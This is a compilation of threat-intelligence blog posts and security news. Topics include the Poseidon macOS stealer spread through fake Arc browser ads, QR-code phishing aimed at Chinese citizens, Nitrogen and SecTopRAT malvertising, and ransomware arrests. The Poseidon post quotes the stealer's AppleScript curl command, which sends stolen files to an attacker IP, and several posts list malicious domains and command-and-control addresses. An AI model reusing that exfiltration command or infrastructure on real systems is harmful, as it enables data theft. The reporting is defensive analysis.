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‘Poseidon’ Mac stealer distributed via Google ads

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/ http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page


There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac will keep detecting this ‘Poseidon campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain


Decoy site


Download URL


Payload SHA256




Python Developers Targeted Via Fake Crytic-Compilers Package

As per recent reports, cybersecurity experts uncovered a troubling development on the Python Package Index (PyPI) – a platform used widely by developers to find and distribute Python packages. A malicious package named ‘crytic-compilers‘ was discovered, mimicking the legitimate ‘crytic-compile’ library developed by Trail of Bits. This fraudulent package was designed with sinister intent: to […]

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Report Details Reemergence of Lockbit 3.0 Ransomware Syndicate

people pointing at laptop keyboard.

An analysis of ransomware attacks claimed to have been perpetrated by cybercriminal syndicates that was published today by NCC Group, a provider of managed security services, finds LockBit 3.0 has reemerged to claim the top spot amongst the most prominent threat actors. Previously dormant following the groups’ takedown by law enforcement officials earlier this year,..

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Cybercriminals Target Trump Supporters with Donation Scams

Trump donation scam

Donald Trump’s presidential campaign is known for aggressively trying to raise money, even sending emails to donors hoping to cash in on setbacks like his conviction late last month on 34 felony counts for illegally influencing the 2016 campaign. Bad actors now are trying to do the same, running donation scams by impersonating the campaign..

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Chinese Citizens Targeted in QR Code-Based Phishing Campaign

QR code-based phishing campaign

Researchers from Cyble Research and Intelligence Labs (CRIL) have discovered a QR code-based phishing campaign that uses malicious Word documents masquerading as official documents from the Ministry of Human Resources and Social Security of China. Users are tricked into providing bank card details and passwords under the guise of identity verification and authentication processes.

QR Code-Based Phishing Campaign

QR code phishing attacks have escalated significantly this year, with cybercriminals leveraging this technology to steal personal and financial information. Threat actors (TAs) are embedding QR codes in office documents and redirecting users to fraudulent websites designed to harvest sensitive data. In the ever-evolving cyber threat landscape, a new vector has emerged: QR code-based phishing campaign. Cybercriminals are increasingly embedding QR codes in malicious documents, which when scanned direct users to fraudulent websites. This tactic has seen a marked rise in 2024 following a trend that started during the COVID-19 pandemic, when QR codes became widely adopted for contactless transactions and information sharing. The Hoxhunt Challenge highlighted a 22% increase in QR code phishing during late 2023, and research by Abnormal Security indicates that 89.3% of these attacks aim to steal credentials. The growing familiarity with QR codes has created a false sense of security, making it easier for cybercriminals to exploit them. QR codes can mask destination URLs, preventing users from easily verifying the legitimacy of the site they are being redirected to.

Recent QR Code Campaigns and Techniques

Recently, Cyble Research and Intelligence Labs uncovered a sophisticated phishing campaign targeting individuals in China. This campaign saw the use of Microsoft Word documents embedded with QR codes, which are distributed via spam email attachments. The documents were designed to appear as official notices from the Ministry of Human Resources and Social Security of China, offering labor subsidies above 1000 RMB to lure victims. [caption id="attachment_77666" align="aligncenter" width="769"]QR code-based phishing campaign MS Word file containing QR code (Source: Cyble)[/caption] The documents are meticulously crafted to look authentic, complete with official logos and language that mimics government communications. Once the QR code in the document is scanned, it redirects the user to a phishing site designed to collect sensitive information. This particular campaign stands out due to its use of a Domain Generation Algorithm (DGA), which generates a series of seemingly random domain names. DGA is a program that generates large numbers of new domain names. Cybercriminals and botnet operators generally use it to frequently change the domains used to launch malware attacks. This technique enables hackers to avoid malware-detection solutions that block specific domain names and static IP addresses. The latest campaign isn't an isolated incident. A similar phishing operation was documented in January 2023 by Fortinet, where cybercriminals impersonated another Chinese government agency. This resurgence in QR code phishing attacks indicates a persistent threat targeting Chinese citizens, with malicious actors continually refining their tactics to evade detection.

The QR Code Phishing Process

The phishing process begins with the user scanning the QR code from the malicious Word document. This action takes them to the phishing site, which initially displays a dialogue box promising a labor subsidy. The site is designed to appear official, complete with government logos and formal language to enhance credibility. The phishing site instructs the user to provide personal information, starting with their name and national ID. This step is presented as a necessary part of the application process for the subsidy. Once the user enters this information, they are directed to a second page that requests detailed bank card information, including the card number, phone number, and balance. This information is ostensibly required for identity verification and to process the subsidy. After collecting the bank card details, the phishing site asks the user to wait while their information is "verified." This waiting period is a tactic used to add a sense of legitimacy to the process. Following this, the site prompts the user to enter their bank card password, under the guise of further verification. This password is suspected to be the same as the payment password used for domestic credit card transactions. By obtaining this password along with the card details, the threat actors can perform unauthorized transactions, leading to significant financial losses for the victim.

Phishing Activity Technical IoCs

The phishing activity begins when the user scans the QR code embedded in the Word document. This action directs them to the link “hxxp://wj[.]zhvsp[.]com”. This initial URL then redirects to a subdomain, “tiozl[.]cn”, created using a DGA. The use of a DGA means the phishing URLs are constantly changing, making them harder to block preemptively. [caption id="attachment_77670" align="aligncenter" width="1024"]QR code-based phishing campaign Landing page of phishing site (Source: Cyble)[/caption] The domain “tiozl[.]cn” is hosted on the IP address “20.2.161[.]134”. This IP address is associated with multiple other domains, suggesting a large-scale phishing operation. The domains linked to this campaign are: - 2wxlrl.tiozl[.]cn - op18bw[.] - gzha31.tiozl[.]cn - i5xydb[.] - hzrz7c.zcyyl[.]com Further investigation revealed that the SHA-256 fingerprint of an SSH server host key associated with the IP address “20.2.161[.]134” is linked to 18 other IPs, all within the same Autonomous System Number (ASN), AS8075, and located in Hong Kong. These IPs host URLs with similar patterns, indicating a coordinated effort to deploy numerous phishing sites. The rise in QR code phishing attacks underscores the increasing sophistication and adaptability of cybercriminals. By exploiting the widespread use of QR codes - especially in a post-pandemic world - these attacks effectively lure users into divulging sensitive financial information. The recent campaign targeting Chinese citizens highlights the severity of this threat, as malicious actors use seemingly official documents to gather card details and passwords, leading to significant financial losses. This trend emphasizes the need for heightened vigilance and robust security measures to protect against such evolving threats.

Recommendations for Mitigation

To mitigate the risk of QR code phishing attacks, CRIL said it is crucial to follow these cybersecurity best practices: 1. Scan QR codes from trusted sources only: Avoid scanning codes from unsolicited emails, messages, or documents, especially those offering financial incentives or urgent actions. 2. Verify URLs before proceeding: After scanning a QR code, carefully check the URL for legitimacy, such as official domains and secure connections (https://). 3. Install reputable antivirus and anti-phishing software: These tools can detect and block malicious websites and downloads. 4. Stay informed about phishing techniques: Educate yourself and others about the risks associated with QR codes to prevent successful phishing attacks. 5. Use two-factor authentication (2FA): This adds an extra layer of security, making it harder for attackers to gain unauthorized access. 6. Keep software up to date: Ensure your operating systems, browsers, and applications are updated with the latest security patches to protect against known vulnerabilities. 7. Use secure QR code scanner apps: Consider apps that check URLs against a database of known malicious sites before opening them. 8. Monitor financial statements regularly: Review your bank and credit card statements for unauthorized transactions and report any suspicious activity immediately.

A New Tactic in the Rapid Evolution of QR Code Scams

QR code phishing

QR codes have been around for three decades, but it wasn’t until the COVID-19 pandemic hit in 2020 that they got wide use, with restaurants, health care facilities, and other businesses turning to them to customers contactless ways to read menus, buy items, or track the health of people in their buildings. Around the same..

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Netcraft Uses Its AI Platform to Trick and Track Online Scammers

romance scams generative AI pig butchering

At the RSA Conference last month, Netcraft introduced a generative AI-powered platform designed to interact with cybercriminals to gain insights into the operations of the conversational scams they’re running and disrupt their attacks. At the time, Ryan Woodley, CEO of the London-based company that offers a range of services from phishing detection to brand, domain,..

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Connecticut Has Highest Rate of Health Care Data Breaches: Study

health care data breaches cybersecurity

It’s no secret that hospitals and other health care organizations are among the top targets for cybercriminals. The ransomware attacks this year on UnitedHealth Group’s Change Healthcare subsidiary, nonprofit organization Ascension, and most recently the National Health Service in England illustrate not only the damage to these organizations’ infrastructure and the personal health data that’s..

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Ukraine National Police Arrest Conti and LockBit Ransomware Cryptor Developer

Ukraine LockBit arrest

Ukraine National Police have arrested a man they say helped disguise ransomware used by Russia-based threat groups. The 28-year-old cryptor developer was unnamed in Ukraine and Netherlands announcements of the arrest, but the Dutch statement said he was arrested on April 18, 2024 in a lead-up to May’s massive “Operation Endgame” botnet takedown.

Cryptor Developer Worked with Conti, LockBit

Ukraine cyber ​​police and National Police investigators say they established that the man was involved in the LockBit and Conti ransomware groups. The Kyiv man infected a company in the Netherlands with Conti ransomware in 2021, demanded a ransom and threatened to release confidential company information if payment wasn’t made, according to the Dutch announcement, which cited work by the Netherlands’ High Tech Crime Team of the National Operations and Interventions Unit and the National Public Prosecution Service. They requested Ukraine’s assistance in the case as part of their investigation. As part of the arrest, Ukrainian police conducted house searches in the city of Kyiv and the Kharkiv region on April 18 and seized computer equipment, mobile phones and documents for further investigation (pictured below). [caption id="attachment_76895" align="alignnone" width="300"]Ukraine ransomware arrest seized items Items seized in Ukraine ransomware arrest[/caption] The Ukraine cyber police said the man “specialized in the development of cryptors,” or “special software for masking computer viruses under the guise of safe files” (quotes translated from the Ukraine statement). “Thanks to his programming skills, the person involved was able to hide malicious software from the most popular antiviruses,” the Ukraine statement added.

LockBit Remains Active Despite Repeated Enforcement Activities

The Conti ransomware group reportedly dissolved in 2022 after a Ukrainian researcher leaked the group's source code in retaliation for the group's support of Russia's invasion of Ukraine, but LockBit has remained persistent. Despite the Ukraine arrest and law enforcement successes like Operation Endgame, Operation Cronos, and the unmasking of formerly anonymous LockBit leader Dmitry Khoroshev, LockBit has shown an ability to continually regroup and reestablish threat activities, recently launching high-profile ransomware attacks such as one that the city of Wichita is finally recovering from. Ukraine officials said the investigation is ongoing. The suspect is being charged under part 5 of Article 361, Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks, of the Criminal Code of Ukraine. The article provides for publishment of up to 15 years of imprisonment, and additional charges are possible. Netherlands officials thanked the Ukrainian investigators for their assistance and said they “are very pleased with the arrest in Ukraine and are grateful for the space that the Ukrainian police have found for this in times of war.”

Ransomware Group Jumps on PHP Vulnerability

PHP ransomware vulnerability

A long-running ransomware campaign that has been targeting Windows and Linux systems since 2019 is the latest example of how closely threat groups track public disclosures of vulnerabilities and proofs-of-concept (PoCs) and how quickly they move in to exploit them. The PHP Group last week disclosed a high-severity flaw – tracked as CVE-2024-4577 and with..

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Network Equipment, IoT Devices are Big Security Risks: Forescout

Forescout networking equipment IoT security risks

IT systems – and this year networking equipment in particular – continue to pose the most security risk for organizations, but it is the vulnerable Internet of Things (IoT) devices that are quickly moving up the ladder, according to researchers with Forescout’s Verdere Labs researchers. In this year’s Riskiest Connected Devices report released this week,..

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Active Nitrogen campaign delivered via malicious ads for PuTTY, FileZilla

In the past couple of weeks, we have observed an ongoing campaign targeting system administrators with fraudulent ads for popular system utilities. The malicious ads are displayed as sponsored results on Google’s search engine page and localized to North America.

Victims are tricked into downloading and running the Nitrogen malware masquerading as a PuTTY or FileZilla installer. Nitrogen is used by threat actors to gain initial access to private networks, followed by data theft and the deployment of ransomware such as BlackCat/ALPHV.

We have reported this campaign to Google but no action has been taken yet. This blog post aims to share the tactics, techniques and procedures (TTPs) as well as indicators of compromise (IOCs) so defenders can take action.

Step 1: Luring victims in via malicious ads

The initial intrusion starts from a malicious ad displayed via Google search. We have observed several different advertiser accounts which were all reported to Google. The lures are utilities commonly used by IT admins such as PuTTY and FileZilla.

Online ads from search engine result pages are increasingly being used to deliver malware to corporate users. ThreatDown users that have DNS Filtering can enable ad blocking in their console to prevent such malvertising attacks:

Step 2: Directing users to lookalike sites

The malvertising infrastructure deployed by Nitrogen threat actors uses a cloaking page that can either redirect to a decoy site or the infamous Rick Astley video. The redirect to a decoy page can be activated if the campaign is not weaponized yet or if the malicious server detects invalid traffic (bot, crawler, etc.).

The Rick Astley redirect is mostly to mock security researchers investigating this campaign:

Actual lookalike pages are meant for potential victims. They are often good-looking copycats which could easily fool just about anyone:

ThreatDown blocks these malicious websites to prevent your users from being social-engineered into downloading malware:

Step 3: Deploying malware via a fraudulent installer

The final step in this malvertising chain consists of downloading and running the malware payload. Nitrogen uses a technique known as DLL sideloading whereby a legitimate and signed executable launches a DLL. In this case, setup.exe (from the Python Software Foundation) sideloads python311.dll (Nitrogen).

ThreatDown via its EDR engine quarantines the malicious DLL immediately. System administrators can log into their console and use the AI-assisted engine to quickly search and review the detection:


While there are many phishing training simulations for email threats, we aren’t aware of similar trainings for malvertising. Yet, the threat has become prevalent enough to warrant better user education.

Endpoints can be protected from malicious ads via group policies that restrict traffic coming from the main and lesser known ad networks. Click here for more information about DNS filtering via our Nebula platform.

Endpoint Detection and Response (EDR) is a cornerstone in your security posture, complemented by Managed Detection and Response (MDR) where analysts can quickly alert you of an impending intrusion.

Indicators of Compromise

Cloaking domains:


Lookalike sites:


Nitrogen payloads (URLs):


Nitrogen payloads (SHA256):


Nitrogen C2s:


Bing ad for NordVPN leads to SecTopRAT

Most of the malicious search ads we have seen have originated from Google, but threat actors are also abusing other search engines. Microsoft Bing is probably the second best target due to its close ties to the Windows ecosystem and Edge browser.

In this blog post, we look at a very recent malvertising campaign impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.

The threat actors went ever further by trying to digitally sign a malicious installer as if they were the official vendor. Victims will have the impression they are getting NordVPN as it is part of the package, but will also inadvertently install a Remote Access Trojan known as SecTopRAT on their computer.

We have reported the malicious Bing ad to Microsoft, and other parts of the distribution infrastructure to their respective provider. We want to reiterate that NordVPN is a legitimate VPN provider and they are being impersonated by threat actors.

Fraudulent Bing ad

When searching for “nord vpn” via the Bing search engine, we identified a malicious ad that impersonates NordVPN. The ad itself looks suspicious because of the URL in the ad snippet. The domain name nordivpn[.]xyz was created one day ago (April 3, 2024). It was probably chosen as it looks quite similar to the official name and can deceive users who aren’t looking too closely.

As we often see, the ad URL is simply used as a redirection mechanism to a fake website that is meant to look identical to the one being impersonated. This is true here as well, where we have a redirect to besthord-vpn[.]com (note again the spelling chosen with the ‘h‘ looking like an ‘n‘) which was created today, only a few hours ago.

The website looks incredibly convincing, and victims will be tricked into downloading the app from there. Unlike the legitimate NordVPN that goes through a sign up process, here you can directly download the installer from Dropbox.

Here’s a summary of the traffic flow from the malicious ad to the download link:

Malware payload

The downloaded file is called NordVPNSetup.exe and is digitally signed, as if it was from its official vendor; however, the signature is not valid.

The file contains both an installer for NordVPN and a malware payload. The installer for NordVPN is meant to give victims the illusion that they are actually installing a real file.

The payload is injected into MSBuild.exe and will connect to the malware author’s command and control server at 45.141.87[.]216 on port 15647.

That network traffic is detected by Emerging Threats as Arechclient2 Backdoor, an alias for SecTopRAT.


Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads. Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters.

ThreatDown customers who have DNS Filtering can proactively block online ads by enabling the rule for advertisements. This is a simple, and yet powerful way to prevent malvertising across an entire organization or in specific areas.

The malicious ad and related indictors have been reported as we work with industry partners to take down this campaign. Dropbox has already taken action to take down the malicious download.

Indicators of Compromise

Malicious domains


Fake NordVPN installer


SecTopRAT C2


2024 State of Malware in Education report: Top 6 cyberthreats facing K-12 and Higher Ed

Educational institutions may face a range of cyberthreats in 2024, but our 2024 State of Malware in Education report identifies the six most critical ones.

Ransomware, for example, stands out as a key threat for schools and universities. The report covers how last year, we witnessed a 92% increase in ransomware attacks in K-12 schools and a 70% increase in Higher Education. The trend appears set to continue, partly due to specialized ransomware groups like Rhysida (formerly Vice Society) targeting educational sectors.  

Education ransomware attacks, 2022 – 2023

Another major threat our 2024 State of Malware in Education covers is the reduction of conventional malware in favor of Living off The Land (LOTL) attacks. LOTL attacks exploit legitimate system tools to remain undetected while conducting harmful activities.

Our report suggests that educational institutions must employ expert staff to manually identify LOTL activities, which traditional malware detection tools miss. For example, we recently wrote how one K-12 district used MDR to uncover malicious PowerShell activity and stop an ongoing infection.

Some other trends and threats educational institutions can expect in the report to cover include:

  • Why targeting Macs has become an easy choice for criminals 
  • How CL0P is rewriting the ransomware playbook and why Big Game ransomware remains the most serious threat.
  • How cybercriminals use ‘malvertising’ to target educational institutions with malicious ads for popular for remote learning such as Zoom. 

As we progress into 2024, the reality is that educational institutions’ success in pairing state of the art security software with skilled security staff will be a deciding factor in their ability to take down the most serious cyberthreats. 

To understand the complete list of threats facing educational institutions in 2024 and how to tackle them, get the full 2024 State of Malware in Education report—tailored to either K-12 or Higher Ed—below.
